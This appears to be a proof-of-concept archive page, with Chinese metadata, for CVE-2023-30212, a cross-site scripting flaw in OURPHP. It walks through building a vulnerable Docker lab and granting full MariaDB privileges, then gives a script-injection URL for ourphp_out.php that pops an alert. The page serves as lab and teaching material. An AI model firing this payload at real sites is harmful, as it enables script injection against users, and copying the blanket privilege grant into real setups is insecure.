关联漏洞
标题:
OURPHP 跨站脚本漏洞
(CVE-2023-30212)
描述:OURPHP是OURPHP开源的一个开源、跨平台、企业级+电商+小程序+APP多终端同步的CMS建站系统。 OURPHP 7.2.0版本及之前版本存在安全漏洞,该漏洞源于通过文件ourphp_out.php发现包含跨站脚本(XSS)漏洞。
描述
Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks
介绍
# create a vulnerable Docker environment that is susceptible to CVE-2023-30212
# Description
Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php
# Configure Docker Exploit CVE-2023-30212 vulnerability
# Installion of Docker
* Download dockerfile and extract it
https://down.chinaz.com/api/index/download?id=51308&type=code
* Download exploit CVE 2023-30212
* Open Terminal in the folder where you saved the dockerfile
* Install the Docker meachine
> sudo apt update
> sudo apt install docker.io
# configure Docker image and Docker condainer
* build a Docker image based on the Dockerfile present in the current directory
> docker build -t < specifies the tag for the image>
> docker build -t test .
* used to run a Docker container based on the image with the tag and map port on the host machine to port inside the container.
> docker run -d -p <port> < Docker image id>
> docker run -d -p 8080:80 test
* check the docker image
> docker ps
* Get a new container id
> bb18debddccc test "docker-php-entrypoi…" 4 minutes ago Up 4 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp angry_turing
* execute an interactive bash session inside a running Docker containe
> docker exec -it bb18debddccc /bin/bash
*Get docker shell
> root@bb18debddccc:/var/www/html#
* set mysql database
> root@bb18debddccc:/var/www/html# mysql
> Welcome to the MariaDB monitor. Commands end with ; or \g.
> Your MariaDB connection id is 38
> Server version: 10.3.38-MariaDB-0+deb10u1 Debian 10
> Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
> Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
> MariaDB [(none)]>
* MySQL or MariaDB to grant all privileges
> GRANT ALL PRIVILEGES ON . TO ' user account'@'localhost' IDENTIFIED BY 'user password' WITH GRANT OPTION;
> GRANT ALL PRIVILEGES ON . TO ' root'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;
This is a SQL command typically used in a database management system like MySQL or MariaDB to grant all privileges to the 'root' user on all databases and tables in the current system.
# Exploit CVE-2023-30212 vulnerability
> Url: http://localhost:8080/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
# Referal
*https://nvd.nist.gov/vuln/detail/CVE-2023-30212
*https://docs.docker.com/engine/install/
> chatGpt
文件快照
[4.0K] /data/pocs/f0ccab50f7c4396b1515652bb872987a2290a15e
├── [7.6K] admin.php
├── [1.4K] dockerfile
├── [4.2K] favicon.ico
├── [ 852] index.php
├── [2.9K] README.md
├── [ 893] search.php
└── [3.5K] 说明.htm
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。